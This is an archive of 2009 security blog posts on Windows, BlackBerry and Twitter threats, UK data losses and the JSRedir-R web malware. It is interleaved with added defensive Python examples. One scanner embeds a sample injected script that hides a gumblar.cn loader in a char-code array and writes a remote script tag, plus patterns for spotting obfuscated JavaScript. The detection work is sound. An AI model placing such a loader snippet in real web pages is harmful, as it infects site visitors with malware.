Friday, May 29, 2009

Cracked Windows - Microsoft warns of critical flaw

Fix It
Microsoft has published a security advisory warning of a critical vulnerability in Microsoft DirectX on older versions of Windows.

The problem lies in the way that Microsoft DirectShow handles QuickTime format files - meaning that if you opened a maliciously crafted QuickTime media file, hackers could run dangerous code on your computer.

According to Microsoft, all versions of Windows Vista and Windows Server 2008 are not vulnerable, but Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are affected.

A proper patch for the problem is not yet available, but the company has issued a workaround that can be used by vulnerable Windows users.

The workaround, which disables QuickTime parsing, involves making changes to the Registry. But if the thought of doing that gives you goosebumps, they've produced a natty automated method that will do it for you. All you need to do is click on a "Fix It" button on their site to run the workaround.

More information about the flaw can be found in Sophos's analysis of the problem.

There's no word yet on when Microsoft will make available a proper fix for this problem, or indeed whether it will be included in their regular scheduled "Patch Tuesday" bundle of patches next month or released as an out-of-band fix.

But I think it's good that they gave the less geeky users of computers a fairly easy way to implement the workaround, rather than leaving them befuddled by complicated instructions.

Thursday, May 28, 2009

Why Geo-tagged Twittering could be bad for security


Twitter bird
The web is becoming increasingly about where you are, not just what you're doing/saying/reading/writing.

For instance, earlier this week I was standing in a horrendously long queue to be admitted into a recording of the BBC TV show QI, hosted by national treasure and well-known Twitter user Stephen Fry.

It became obvious to me pretty early on that there were many more people in the queue than there were likely to be seats in the studio - but there didn't seem to be any official in charge to ask what our chances of being admitted were. So, I went to Twitter and searched for "QI".

I got a number of results - many of them useless - but some of them were from other people in the queue. Now, wouldn't it have been handy if I could only have seen Tweets from people within - say - 400 yards of me?

Well, if the rumoured changes coming to Twitter are true then that may soon be possible. At a conference earlier this week, Twitter API guru Alex Payne told attendees that one of the new features that the micro-blogging site might introduce shortly is sharing of your geographic location at the point of your tweeting.

Yuck! I'm not sure I like that.

There's little enough privacy in the way many people are using Twitter right now, without also providing complete strangers with precise details of where you are.

Yes, I can see why marketroids and developers might love to be able to work out where people are at a particular time, in order to advertise to them more precisely or provide location-specific services, but I can also imagine many circumstances when I would want to keep my precise position completely private.

And let's not forget that Twitter celebrities like Ashton Kutcher, Ellen DeGeneres, Oprah Winfrey and Ryan Seacrest have over a million followers. There are bound to be a few bad apples in that bunch who may have a less than healthy interest in the precise coffee bar where their favourite star is currently having a Skinny Caffe Latte.

Just ask Yoko Ono (46,137 followers and counting) about the dangers of obsessed fans.

I'm no celebrity, but I don't want people to know where I am. If nothing else, information like that could be valuable for burglars who want to know when is the best time to raid my house.

So, here's my message to Twitter. Please don't turn on geo-tagging by default. Force people to make a conscious decision that they want their Tweets to reveal where they are at the time they Tweeted.

Otherwise, I think you can expect an almighty backlash.

(By the way, as it was, I didn't get to see QI. It turned out I was about 10 minutes too late joining the queue. Instead I went to see Star Trek. It was pretty good for what it was - but I will always be a Doctor Who fan at heart).

Wednesday, May 27, 2009

How to control a Blackberry Enterprise Server with just a PDF


Sorry, I'm not actually going to tell you how to do that.

But Research In Motion (RIM), the company that makes the BlackBerry smartphones beloved by corporate workers worldwide, has warned of a vulnerability in the way its devices handle PDF files which could allow hackers to remotely execute code.

According to a security advisory issued by the firm, hackers could send an email message with an attached PDF file that, when opened by a BlackBerry mobile user, could cause code to be launched on the computer that hosts the BlackBerry Attachment Service. Of course, this isn't the first time that this kind of problem with RIM's BlackBerry has bubbled up.

RIM is advising that companies disable PDF file processing on the BlackBerry server until the patches are rolled out.

As we've reported umpteen times before, hackers are increasingly exploiting the PDF file format to deliver malicious code to unsuspecting computer users.

As PDFs are so widely used and shared in business, most people wouldn't think twice about clicking on them, making it imperative that corporations keep their security patches and anti-malware defences up-to-date.

Tuesday, May 26, 2009

NHS accused of "cavalier attitude" after data security leaks

Information Commissioner's Office
The British National Health Service (NHS) has been accused of losing almost as much personal data in the first three months of this year as the entire private sector.

With over 140 security breaches by the NHS logged by the Information Commissioner since January, outranking all local and central government data losses combined, it has been confirmed as the public sector's main loser of personal data.

Richard Thomas, the Information Commissioner, and assistant commissioner Mick Gorrill told the Independent newspaper that NHS workers were demonstrating a "cavalier attitude" and that "there is a complete disconnect between the procedures laid down by managers and what happens on the ground. We need a complete audit to try to change the culture."

Here are some of the security breaches that rang alarm bells at the Information Commissioner's Office:

  • A GP downloaded sensitive details of 10,000 patients to an insecure laptop. The laptop was stolen and still remains missing.
  • Old NHS computers containing the medical notes, names and addresses of 2,500 people were stolen from a skip.
  • A lost memory stick containing medical details of over 6,000 prisoners was encrypted and password-protected, but sadly the password was written on a note attached to the device.

One of the challenges facing the NHS is that it's the largest employer in Europe (in fact, apart from the Chinese Army and the Indian Railway system it's probably the biggest in the world), and trying to ensure that all staff treat data securely and sensibly is always going to be a challenge.

That's why it's essential that full disk encryption becomes a norm inside organisations that are handling sensitive data, such as patient records. Accidents like lost laptops will continue to happen - but something can be done to ensure that any data lost is gobbledygook that will be useless even if it does fall into the wrong hands.

Alongside encryption, organisations need to centrally monitor compliance with internal policies and external regulations through comprehensive logging and reporting.

Other organisations would be wise not to sit smugly and smirk at the NHS's misfortune. These are problems that more and more companies are going to be facing sooner rather than later.

Monday, May 25, 2009

Fear of blackmail after RAF loses sensitive personal data

RAF logo
Highly personal information about senior officers of the Royal Air Force (RAF) - including details of extra-marital affairs, debt, drug abuse, and the use of prostitutes - is alleged to be amongst the data lost from a base in Innsworth, Gloucestershire.

When I originally reported on the stolen USB drives last September, it was suggested that the information stolen had been names, service numbers, addresses and dates of birth.

Now it seems secrets of a much more sensitive nature were also lost.

Why does the RAF have such information? Because before staff are allowed access to highly sensitive information they are put through a gruelling vetting procedure - to see if they have any skeletons in their cupboards which others may use for blackmail purposes.

A former serving officer in the RAF, who uncovered the memo after reportedly worrying about his own data being lost, told the BBC, "They'd ask you questions such as: is there anything unusual about your sex life? Have you had affairs? Used prostitutes? That sort of thing. If the information got into the wrong hands then it could leave people wide open."

An internal email from an unnamed wing commander, seen by the media, says that the lost data "provides excellent material for Foreign Intelligence Services, investigative journalists and blackmailers".

The fact that the RAF did not reveal that vetting data had also been lost has led some to suggest a cover-up has occurred to save the force's embarrassment. For its part, the RAF is keen to stress that there is no indication that the data has fallen into hostile hands.

Of course, this would probably hardly be a story if the RAF had taken the sensible step in the first place of ensuring that this information was properly and securely encrypted - thus making the lost drives as useful to potential blackmailers as handlebars on a surfboard.

Sunday, May 24, 2009

Acai Berry spammers hack Twitter accounts to spread adverts

Hundreds of innocent users' accounts on the Twitter micro-blogging service appear to have been hacked by spammers.

A typical message posted on the compromised accounts will say something similar to the following:

Howdy my friend! I just lost 13 pounds in 12 days. It only costs me $5. Take a look at this: http://[random].cn

Examples of Acai Berry spam on Twitter

If you do click on the link you get taken to a website with a .cn tld (top level domain) like the following:

One of the websites set up by the spammers

Some victims of this latest Twitter hack attack have, however, noticed that their accounts are sending Acai Berry spam. Take this example, for instance, where the user has apologised for the security breach on his account:

Twitter account abused by Acai Berry spammers

The question is - how have these accounts on Twitter been hacked? At the moment, that's not clear. But what is evident is that users need to take more care with their Twitter passwords.

If your account on Twitter has been compromised, make sure you change your password to a non-dictionary word - and be sure to also change any other online accounts where you might be using the same password. Far too many people use the same passwords on multiple sites, which obviously increases your chances of becoming hacked.

Friday, May 22, 2009

Podcast: Defeating hackers is hard


When I was at the RSA show in San Francisco last month I had the opportunity to spend a little time with Robert Westervelt, news editor at SearchSecurity.com.

Below you'll find a podcast we recorded where Rob lets me ramble on about the anti-virus industry, the threat landscape, the Conficker worm and why it's a struggle to bring international cybercriminal gangs to justice.

Rob had a cameraman with him, but I haven't seen the video of our conversation yet. If it does show up, I'll try and embed it here on the website too.

Thursday, May 21, 2009

Beware tvviter.com - video of a live Twitter phishing attack

I got an email this morning saying that someone called "3XNJTVJG0SYIKDH (NinaOchoa)" was following my updates on Twitter.

That's rather an odd name, I thought, and investigated further.

Turns out that 3XNJTVJG0SYIKDH (let's call her 3XNJTV for short) was already following nearly 400 people on Twitter, but had only ever posted one update:

check this guy out [followed by a tinyurl address]

Fortunately, I use LongUrl. I've blogged about LongUrl before, but in a nutshell it's a cool add-on for Firefox which converts short URLs - like those often used on Twitter - into their true, much longer form.

And I was able to see that 3XNJTV (okay, let's call her "Nina") was trying to point me towards a website called tvviter.com.

Did you read that right? tvviter.com (double V, not W).

Yup, it's not the real Twitter site.

But if you do make the mistake of clicking on the link you will be taken to a bogus website which is pretending to be Twitter, and hopes to fool you into handing over your username and password (which could lead ultimately to some painful identity fraud, as well as your account being used for the purposes of spam or spreading malware).

At the time of writing the user and the website are still live - I wouldn't recommend visiting either.

And further analysis suggests that there are many other bogus Twitter users out there telling you to "check this out" and pointing to the same TinyURL link this morning.

Animated GIF of other Twitter accounts trying to phish details from unwary users

Be careful out there.
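The two defensive steps in this post - expanding a short link to see where it really goes, and noticing that "tvviter" is not "twitter" - can be automated. The following is an added example, not code from the post, from LongUrl or from Twitter. It assumes a caller-supplied redirect resolver (here a constructed lookup table standing in for a URL shortener, with a placeholder path rather than the TinyURL address from the post), a constructed list of protected hostnames, and a deliberately simplified "last two labels" notion of the registrable domain. The lookalike check collapses confusable sequences such as "vv" and then allows one edit of slack, so tvviter.com is matched to twitter.com even though the skeletons differ by a letter.

```python
from urllib.parse import urlsplit

# Hostnames whose lookalikes we want to catch (constructed list for this example).
PROTECTED_HOSTS = {"twitter.com"}

# ASCII sequences that read like another letter at a glance. "vv" -> "w" is the
# trick behind tvviter.com in the post above; the rest are common variants.
CONFUSABLES = [("vv", "w"), ("rn", "m"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def skeleton(host):
    """Collapse confusable sequences so visually similar names compare equal."""
    host = host.lower().strip(".")
    for seq, repl in CONFUSABLES:
        host = host.replace(seq, repl)
    return host


def registrable_part(host):
    """Keep only the last two labels (tvviter.com from www.tvviter.com).
    Assumption: simplified; production code should consult the Public Suffix List."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Plain Levenshtein distance, enough to catch a dropped or swapped letter."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_for(host, protected=PROTECTED_HOSTS):
    """Return the protected host that `host` imitates, or None.
    The genuine host is never reported as a lookalike of itself."""
    reg = registrable_part(host)
    if reg in protected:
        return None
    for brand in protected:
        if edit_distance(skeleton(reg), skeleton(brand)) <= 1:
            return brand
    return None


def expand_short_url(url, resolve, max_hops=10):
    """Follow a redirect chain using a caller-supplied resolve(url) -> next URL or None.
    Injecting the resolver keeps this offline; a real one would issue HEAD requests
    and read the Location header without ever rendering the destination page."""
    chain = [url]
    for _ in range(max_hops):
        nxt = resolve(url)
        if nxt is None:
            return url, chain
        url = nxt
        chain.append(url)
    raise RuntimeError("redirect chain too long")


def check_link(url, resolve):
    """Expand a short URL and report whether its final host imitates a protected one."""
    final, chain = expand_short_url(url, resolve)
    host = urlsplit(final).hostname or ""
    return {"final_url": final, "hops": len(chain) - 1, "imitates": lookalike_for(host)}


# Constructed stand-in for a URL shortener: the short link's path is a placeholder,
# not the TinyURL address from the post.
FAKE_REDIRECTS = {"http://tinyurl.com/PLACEHOLDER": "http://tvviter.com/"}


def fake_resolve(url):
    return FAKE_REDIRECTS.get(url)


if __name__ == "__main__":
    print(check_link("http://tinyurl.com/PLACEHOLDER", fake_resolve))
```

The one-edit tolerance will also flag some honest names that happen to sit one letter away from a protected host, so treat a match as a reason to warn the user, not as proof of phishing.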

Tuesday, May 19, 2009

Bad news - it's child's play for anyone to recover your deleted Twitterings

Tweleted logo
Following last night's discussion about British TV celebrity Jonathan Ross accidentally revealing his personal email address on Twitter (and how, despite his attempts to delete the Tweet, it's still available for anyone to read) I've found out about an online service which makes it even easier to find those Tweets that all of us would like to retract.

Tweleted is a simple website that allows you to enter anybody's Twitter name and it will then uncover their "deleted" Tweets by comparing the individual's Twitter history to the results from Twitter Search.

The outcome? Anyone can easily find out all they would ever want to know about your deleted Tweets.

The only good news is that it appears to search back through only your last 1000 or so messages, but that'll be scant relief for those who've accidentally pressed a little prematurely.

As I said in the earlier video, Twitter really needs to get this problem fixed. Twitter users expect their Tweets to be deleted when they press the delete button, not for strangers to be able to uncover them at will.

At the moment, all Twitter can suggest if you want to really remove a public Tweet you made in error from their search results is that you contact them.

Shouldn't it be simpler than that?

Deleted should always mean deleted, and nothing less.
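The underlying failure is an engineering one: a delete that only reaches the primary store, while a secondary copy (here, the search index) keeps serving the record. The toy model below is an added example, not Twitter's or Tweleted's code. It assumes a constructed in-memory timeline plus a word-based search index, a constructed user "alice" and a constructed message, and a flag that switches between a delete that forgets the index and one that purges it. The `leaked_deletions` check is the comparison the post describes: anything the index still attributes to a user that is absent from their timeline is a deletion that never propagated.

```python
class TweetService:
    """Toy model of a primary timeline store plus a separate search index.
    purge_index_on_delete=False reproduces the failure the post describes:
    the tweet vanishes from the timeline but the search index still returns it."""

    def __init__(self, purge_index_on_delete):
        self.timeline = {}        # tweet_id -> (user, text)
        self.search_index = {}    # word -> set of (tweet_id, user)
        self.purge = purge_index_on_delete
        self._next_id = 1

    def post(self, user, text):
        tid = self._next_id
        self._next_id += 1
        self.timeline[tid] = (user, text)
        for word in text.lower().split():
            self.search_index.setdefault(word, set()).add((tid, user))
        return tid

    def delete(self, tid):
        user, text = self.timeline.pop(tid)
        if self.purge:
            # Deletion must reach every copy, not just the primary store.
            for word in text.lower().split():
                self.search_index.get(word, set()).discard((tid, user))

    def search(self, word):
        return set(self.search_index.get(word.lower(), set()))

    def timeline_ids(self, user):
        return {tid for tid, (u, _) in self.timeline.items() if u == user}


def leaked_deletions(service, user, probe_words):
    """Tweleted-style check: tweets the search index still attributes to `user`
    that no longer appear on their timeline are deletions that failed to propagate."""
    still_indexed = set()
    for word in probe_words:
        still_indexed |= {tid for tid, u in service.search(word) if u == user}
    return still_indexed - service.timeline_ids(user)


def demo(purge_index_on_delete):
    """Post a message containing an address (constructed), delete it, then look for leaks."""
    svc = TweetService(purge_index_on_delete)
    tid = svc.post("alice", "oops my email is alice@example.invalid")
    svc.delete(tid)
    return leaked_deletions(svc, "alice", ["email"])


if __name__ == "__main__":
    print("leaks without purge:", demo(False))
    print("leaks with purge:   ", demo(True))
```

In a real system the "index" may be several things at once (search, caches, third-party syndication), and the same check applied after every delete is a cheap regression test that deletion reaches all of them.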

Monday, May 18, 2009

BBC film of remote Trojan horse attack

A couple of months ago, the BBC broadcast a film that many people believe showed them breaking the law, by accessing the computers of unsuspecting members of the public without their permission in order to demonstrate how easy it was to send spam.

There was a right royal stink about it.

I must admit that I was disheartened with the way the BBC behaved (as I felt it was completely unnecessary to break the law in order to demonstrate the problem of botnets), and felt even more let-down when they censored me from making my views heard!

Anyway, today the BBC has published another movie - again with assistance from Jacques Erasmus of PrevX.

It's a short and basic video, and doesn't demonstrate anything that anyone who has been following IT security for the last few years doesn't already know. But this time they seem to have gone out of their way to make it clear that they did have the permission from the owner to access the PC.

It's good to see that they seem to have learnt something from the earlier furore.

Friday, May 15, 2009

Guest blog: Security = safety? Sounds risky!

"Graham Lee, is not only a near namesake of mine, but also a senior Mac software engineer at Sophos and the author of "Ten tips to secure Apple Mac laptops". Over to you Graham..."

Graham Lee... who is not the same person as Graham Cluley
Earlier this week, Dennis Fisher wrote a column for ThreatPost declaring that Snow Leopard security is all relative, which John Gruber linked to with a discussion on Daring Fireball, called the difference between security and safety.

I wanted to address both, but realised I was in danger of rambling - so I have decided just to look at Gruber's post.

One thing which annoys me, and which I addressed in my talk to NSConference in April, is this idea that security means something different in the online world than the real world.

No, it doesn't.

If we try to claim that words have different meanings when used about computers then all we end up doing is confusing people. Do any of the keys you lock your doors with have a piece you give away freely to other people? No? Then why do we have public keys in asymmetric encryption?

Anyway, in the Daring Fireball post, we see "Security is about technical measures, like the strength of the locks on your doors and windows."

Those are security measures. Security is being (or feeling) free from threat, both in the real world and online. I saw a definition of security as a state where "things which should happen, do, and things which shouldn't happen, don't" and to me that seems like a good meaning. Notice too that it isn't a technosphere-only definition.

So why has Gruber taken a narrower view?

Maybe he wanted to avoid the "Macs are more secure" canard by giving "the likelihood that you'll actually suffer from some sort of attack" another name: safety. So it doesn't matter whether Macs are more secure or not, says he, they're more safe and that's what people are after.

Well, it isn't; it's (along with the cost of such an attack) risk. Safety is the state of not suffering or causing harm.

But even ignoring the lexical games, risks are like stock prices - previous performance isn't always a good indicator of future behaviour. When CISOs write security policies they consider (or at least they should consider) what looks likely to happen - or expensive if it were to happen, or both - in the future. Relying too much on previous personal experiences is a known effect, though. It's a form of the availability heuristic.

Just as people who've never been burgled tend to consider the likelihood of being burgled in the future to be lower than those who have, could it be that the Mac users who've never knowingly experienced a malware attack have an artificially low opinion of the future likelihood?

What we really know is that Macs have a lower historical frequency of being targets of malware attacks.

Risks are also like shares in that there are many of them, and they all perform differently.

In fact, going back to the burglaries, many burglars get in through an unlocked window or door - the real-life analogy to having a guessable or empty password.

That's going to let people in, malware or no malware.

Thursday, May 14, 2009

Malicious JSRedir-R script found to be biggest malware threat on the web

Research done by experts in SophosLabs has revealed that a new web-based threat has blown all previous web-based malware out of the water, being found six times more often than its nearest rival.

Troj/JSRedir-R accounts for some 42% of all malicious infections found on websites in the last seven days, massively overshadowing its nearest rival - Mal/Iframe-F - at 7%.

Typically, JSRedir-R is found on legitimate websites, hidden behind obfuscated JavaScript, loading malicious content from third-party sites without the user's knowledge. In the case below, the obfuscated script tries to download dangerous code from a site called gumblar.cn.

JSRedir-R uses obfuscated JavaScript

High traffic websites which have been hit by the attack include the highly unpleasant 2 Girls 1 Cup viral video site (I've never been there, but its Wikipedia entry tells me that I probably would never want to, and neither should you), as reported by SophosLabs at the beginning of the month.

For JSRedir-R to have overtaken the previously seemingly unbeatable Mal/Iframe-F in the web malware charts is quite an event. Users of Sophos security solutions, including our web appliance, are already protected against this threat - but if you use another vendor's product make sure that you are updated and protecting against JSRedir-R before it drags malicious code onto your desktops.

In addition, if you run a website make sure it is properly hardened to prevent hackers from injecting their malicious code into your pages, or you could be passing an unpleasant pox onto your visitors.

No-one should be in any doubt that the web is the primary vector by which hackers are trying to infect computers today. Our most recent security threat report revealed that we see a new infected webpage every 4.5 seconds - that's three times more than the rate in 2007 - and it doesn't look like things are getting any better.

Update: Read the blog entry from Paul Baccas of Sophos to read more about how this malware is being planted, and how to clean up your website afterwards.
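Website owners checking their own pages for the kind of injection described above can look for the tell-tale signs rather than the exact script: inline scripts that lean on `String.fromCharCode`, `unescape`, `eval` or `document.write`, and hostnames that only appear once the character codes are decoded. The scanner below is an added example, not Sophos's detection logic. The page it scans is constructed for this example in the shape the post describes (an ordinary page with one injected script that hides its loader host in a char-code array); it is not the real JSRedir-R code, and the host it decodes to is the one named in the post.

```python
import re

# Constructed sample in the *shape* the post describes: a legitimate page with an injected
# script that hides the loader host behind String.fromCharCode. This is not the real
# JSRedir-R code; the host it decodes to is the one named in the post.
SAMPLE_HTML = """<html><body><h1>Welcome to our site</h1>
<script>var s=String.fromCharCode(103,117,109,98,108,97,114,46,99,110);
document.write('<script src="http://'+s+'/"></'+'script>');</script>
</body></html>"""

# Calls that are rare in hand-written page scripts but typical of obfuscated loaders.
SUSPICIOUS_CALLS = ("String.fromCharCode", "unescape(", "eval(", "document.write(")

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I)


def decode_charcode_calls(js):
    """Decode every String.fromCharCode(...) literal list so a hidden string becomes readable."""
    decoded = []
    for m in CHARCODE_RE.finditer(js):
        codes = [int(x) for x in re.sub(r"\s", "", m.group(1)).split(",") if x]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def analyse_scripts(html):
    """Score each inline script and surface any hostnames hidden inside char-code arrays."""
    findings = []
    for idx, m in enumerate(SCRIPT_RE.finditer(html)):
        js = m.group(1)
        score = sum(js.count(call) for call in SUSPICIOUS_CALLS)
        decoded = decode_charcode_calls(js)
        hosts = sorted({h.lower() for d in decoded for h in HOST_RE.findall(d)})
        if score or decoded:
            findings.append({
                "script": idx,
                "score": score,
                "decoded": decoded,
                "hidden_hosts": hosts,
                # Heuristic: a decoded hostname, or two or more obfuscation
                # primitives in one script, is enough to flag it for review.
                "suspicious": bool(hosts) or score >= 2,
            })
    return findings


if __name__ == "__main__":
    for finding in analyse_scripts(SAMPLE_HTML):
        print(finding)
```

Run it over the HTML your web server actually sends (not the files you think are on disk), because this class of attack often works by altering the served pages after the fact; a clean scan after the cleanup described in the update above is the check that the injection is really gone.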